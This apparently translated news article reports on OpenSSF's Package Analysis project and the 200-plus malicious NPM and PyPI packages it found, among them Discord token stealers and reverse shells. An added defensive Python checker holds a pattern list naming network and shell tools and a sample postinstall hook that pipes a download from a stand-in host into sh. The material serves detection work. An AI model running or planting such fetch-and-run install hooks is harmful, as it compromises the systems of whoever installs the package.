Analyzer published that identified 200 malicious packages in NPM and PyPI

OpenSSF (Open Source Security Foundation), founded by the Linux Foundation with the goal of improving the security of open-source software, has launched the open-source Package Analysis project, which builds a system for checking packages for the presence of malicious code. The project code is written in Go and distributed under the Apache 2.0 license. An initial analysis of the NPM and PyPI repositories with the provided tooling identified more than 200 previously unnoticed malicious packages.

Most of the problematic packages exploit name collisions with internal dependencies that are not publicly available (dependency confusion attacks) or use typosquatting techniques (registering names similar to those of popular libraries), and also invoke scripts that contact external servers during installation. According to the Package Analysis developers, most of the identified problematic packages were created by security researchers taking part in bug bounty programs, since the data sent is limited to the user and system name, and the actions are performed openly, without any attempt to hide their behaviour.

Packages with malicious activity include:

  • The PyPI package discordcmd, which stood out for sending unusual requests to raw.githubusercontent.com, the Discord API and ipinfo.io. The package downloaded a backdoor from GitHub and installed it into the Discord Windows client directory, after which it searched files for Discord tokens and sent them to an external Discord server controlled by the attackers.
  • The NPM package colorss likewise attempted to send tokens from a Discord account to an external server.
  • The NPM package @roku-web-core/ajax - during installation it sent system information and launched a handler (reverse shell) that accepts external connections and executes commands.
  • The PyPI package secrevthree - launched a reverse shell when a certain module was imported.
  • The NPM package random-vouchercode-generator - after the library was imported, it sent a request to an external server, which returned a command and the time at which it should be executed.

The work of Package Analysis comes down to analyzing the package source code to identify network access, file access and command invocation. In addition, package updates are analyzed to detect malicious activity added in one of the releases of previously benign software. To monitor the appearance of new packages in repositories and changes to previously published packages, the Package Feeds toolkit is used, which unifies work with the NPM, PyPI, Go, RubyGems, Packagist, NuGet and Crates repositories.
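As an added illustration of two of the signals described above, install-time scripts that contact external hosts and names that resemble popular libraries, here is a small static checker for npm package.json files. It is example code written for this article, not part of the OpenSSF Package Analysis project; the POPULAR list, the host example.invalid and the sample package.json are constructed.

```python
import json
import re
from difflib import SequenceMatcher

# Lifecycle hooks that npm runs automatically during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Commands that typically reach the network or spawn a shell from an install script.
NETWORK_OR_EXEC = re.compile(r"\b(curl|wget|nc|ncat|bash\s+-i|sh\s+-i|node\s+-e|python[23]?\s+-c)\b")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Constructed list of popular names; a real check would use registry download statistics.
POPULAR = ("colors", "lodash", "express", "request")

def similar_popular_name(name, popular=POPULAR, threshold=0.85):
    """Return the popular package this name most closely resembles, or None."""
    best = None
    for p in popular:
        if name == p:
            return None  # an exact match is the legitimate package itself
        ratio = SequenceMatcher(None, name, p).ratio()
        if ratio >= threshold and (best is None or ratio > best[1]):
            best = (p, ratio)
    return best[0] if best else None

def audit_package_json(text, popular=POPULAR):
    """Return a list of human-readable findings for a package.json document."""
    pkg = json.loads(text)
    findings = []
    name = pkg.get("name", "")
    lookalike = similar_popular_name(name, popular)
    if lookalike:
        findings.append(f"name '{name}' resembles popular package '{lookalike}'")
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue  # only hooks that run without the user asking are of interest
        for host in HOST_RE.findall(cmd):
            findings.append(f"{hook} script contacts external host {host}")
        m = NETWORK_OR_EXEC.search(cmd)
        if m:
            findings.append(f"{hook} script runs '{m.group(1)}'")
    return findings

# Constructed sample combining a lookalike name with a network-fetching postinstall hook.
SAMPLE = """{"name": "lodaash",
  "scripts": {"postinstall": "curl -s https://example.invalid/stage2.sh | sh",
              "test": "node test.js"}}"""

if __name__ == "__main__":
    for finding in audit_package_json(SAMPLE):
        print(finding)
```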

Package Analysis consists of three main components that can be used together or separately:

  • A scheduler that launches package analysis tasks based on data from Package Feeds.
  • An analyzer that directly checks the package and evaluates its behaviour using static analysis and tracing techniques. Testing is performed in an isolated environment.
  • A loader that writes the test results to BigQuery storage.

Source: opennet.ru
